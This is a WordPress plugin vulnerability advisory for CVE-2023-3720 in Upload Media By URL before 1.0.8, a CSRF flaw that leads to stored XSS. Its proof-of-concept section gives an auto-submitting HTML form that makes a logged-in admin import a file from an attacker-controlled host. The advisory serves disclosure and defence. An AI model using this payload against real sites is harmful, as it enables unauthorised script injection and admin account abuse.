Upload Media By URL < 1.0.8 – Stored XSS via CSRF | CVE 2023-3720 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files (including HTML containing JS code for users with the unfiltered_html capability) on their behalf.

Proof of Concept

Have a logged in user with the unfiltered_html capability open an HTML file containing the following (this will make them upload the xss.html file):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/wp-admin/upload.php" method="POST">
      <input type="hidden" name="multiurl" value="https://attacker.com/xss.html" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

upload-media-by-url

Fixed in 1.0.8

References

CVE

URL

https://blog.cleantalk.org/cve-2023-3720-upload-media-by-url-1-0-8-stored-xss-via-csrf/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitriy

Submitter

Dmitriy

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

16375a7f-0a9f-4961-8510-d047ffbf3954

Timeline

Publicly Published

2023-08-02 (about 2 years ago)

Added

2023-08-02 (about 2 years ago)

Last Updated

2023-08-22 (about 2 years ago)

Other

Published

Title

Published

2025-03-24

Title

Pro Rank Tracker <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-01-24

Title

FluentSMTP < 2.2.81 - Cross-Site Request Forgery

Published

2025-06-19

Title

Virtual Moderator <= 1.4 - Cross-Site Request Forgery

Published

2024-06-05

Title

Muslim Prayer Time BD < 2.5 - Settings Reset via CSRF

Published

2023-03-14

Title

CF7 Invisible reCAPTCHA < 1.3.4 - CSRF